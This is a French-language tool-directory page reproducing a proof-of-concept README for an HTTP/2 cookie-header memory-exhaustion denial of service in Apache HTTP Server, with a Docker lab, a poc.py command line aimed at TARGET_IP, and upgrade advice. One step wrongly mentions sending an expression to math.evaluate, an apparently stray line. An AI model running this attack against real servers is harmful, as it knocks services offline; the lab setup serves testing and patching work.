Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-49975 — Proof-of-concept d'exploit HTTP/2 Bomb pour CVE-2026-49975, un déni de service par épuisement de mémoire via l'en-tête cookie dans Apache HTTP Server 2.4.17-2.4.67, avec un laboratoire Docker et un script PoC. | Kitploit
Outils/GitHubGitHub/yym8538/cve-2026-49975
Analyse des VulnérabilitésExploitationSécurité WebSécurité RéseauRed Teaming
GitHubyym8538/cve-2026-49975

CVE-2026-49975

Proof-of-concept d'exploit HTTP/2 Bomb pour CVE-2026-49975, un déni de service par épuisement de mémoire via l'en-tête cookie dans Apache HTTP Server 2.4.17-2.4.67, avec un laboratoire Docker et un script PoC.

Voir le dépôt
1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-49975 HTTP/2 Bomb

★ CVE-2026-49975 HTTP/2 Bomb PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


Aperçu

CVE-2026-49975 est une vulnérabilité de déni de service (DoS) dans Apache HTTP Server. La vulnérabilité se situe dans le chemin de traitement des requêtes HTTP/2, où plusieurs champs d'en-tête cookie peuvent être fusionnés sans être correctement comptabilisés par rapport à LimitRequestFields. En envoyant une petite requête HTTP/2 encodée en HPACK qui se développe en de nombreux champs d'en-tête cookie, un attaquant peut forcer le serveur à allouer de la mémoire de manière répétée lors de la fusion des en-têtes Cookie. L'attaquant peut ensuite utiliser le contrôle de flux HTTP/2 pour retarder la transmission de la réponse, en maintenant les flux affectés ouverts et en empêchant la libération de la mémoire allouée.


Versions affectées

CatégorieVersion
VulnérableApache HTTP Server 2.4.17 ≤ version ≤ 2.4.67
CorrigéeApache HTTP Server 2.4.68 ou ultérieure

Impact

  • Déni de service (DoS) à distance
  • Consommation excessive de mémoire
  • Traitement retardé ou échoué des requêtes utilisateur normales

Environnement

Construisez et exécutez l'environnement Apache HTTP Server vulnérable.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

Après avoir démarré l'environnement vulnérable, suivez les étapes ci-dessous pour reproduire l'attaque.

Étape 1. Surveiller l'utilisation mémoire du serveur

root@kitploit:~
docker stats cve-2026-49975

Exemple de sortie :

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Étape 2. Exécuter le PoC HTTP/2 Bomb

Envoyez l'expression suivante à math.evaluate (par exemple, via l'entrée de calcul de l'application).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Étape 3. Confirmer le résultat

Vérifiez que l'utilisation mémoire du conteneur Apache augmente et reste élevée tant que les flux de l'attaque sont maintenus ouverts.

Atténuation

  • Mettre à niveau Apache HTTP Server vers la version 2.4.68 ou ultérieure
  • Envisager de désactiver temporairement HTTP/2 si le service n'en a pas besoin

Analyse

  • KR : https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN :
Télécharger l’outil